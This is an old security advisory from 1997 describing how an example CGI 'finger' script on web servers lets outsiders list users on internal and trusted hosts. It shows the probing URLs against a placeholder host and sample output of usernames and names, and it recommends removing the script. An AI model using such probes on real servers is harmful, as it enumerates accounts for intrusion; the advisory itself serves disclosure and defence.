************** Corinne Posse Security Notice  **************
Issue Number 2: 970225
 **************  http://corinne.mac.edu/posse  **************

**** User Security and Safety-- possible breech ****

Systems Affected: 
Any system running any WWW server which includes the example CGI program
"finger".

finger, the standard Unix command used to look up users on a system, has
been deemed a security hole by some sites and in some cases shut off.
Other variations of finger have been altered so that a user can control
exactly what information about his/her login is shared on the local
machine and over the wire. In other instances, tcpwrappers are used so
that only trusted systems on a LAN can finger other machines. Having the
CGI program "finger" installed can breech security in all these instances.

Finger a site on the net, out of the blue.

Example:

[user@mybox] finger @host.i.want.to.own.com

/////////////////////////////////////////////////
*
* WARNING: Your finger attempt from user@myhost
* has been recorded in our logs.
* Any more finger attempts from your host, and
* we will consider those actions an attack on
* our host. We will prosecute anyone we feel is
* intruding onto our network.
*
/////////////////////////////////////////////////

[user@mybox] lynx http://host.i.want.to.own.com/cgi-bin/finger?@localhost

[localhost.i.want.to.own.com] 
Login    Name                 Tty  Idle  Login Time   Office   Office Phone
lip      Larry I. Peters       qf     -  Feb 19 15:01
jack     Jack Daniels          pd 23:40  Feb 18 14:44
jdobman  J. Doberman           p1     3  Feb 19 12:32 Room 101
jdobman  J. Doberman           q1  2:48  Feb  9 15:57 Room 101
red      R. Earl Davies       *q5  1:26  Feb 19 08:43

With that one CGI program, an entire network's security has been violated.
Imagine that host.i.want.to.own.com has a machine specifically for
processing orders.  Knowing a username on that machine makes it a lot
easier for a potential hacker to get in. If software such as tcpwrappers
are in use on the LAN, chances are it will be configured so that local
users can see who is logged in where. 

[user@mybox] lynx
http://host.i.want.to.own.com/cgi-bin/finger?@trustedhost

[trustedhost]
Login    Name                 Tty  Idle  Login Time   Office   Office Phone
lip      Larry I. Peters       q1     -  Feb 19 15:01
jack     Jack Daniels          p0  1:40  Feb 18 14:44

Now, an entire network has had a security breech, not just one system.
Most people have no real use for /cgi-bin/finger, the easiest way to take
care of this problem is to remove the script.

[Concept by: Person unknown]
[Written by: Jack O'Reilly, jack0@corinne.mac.edu]
[Rehashed: Jonathan Katz, jkatz@corinne.mac.edu]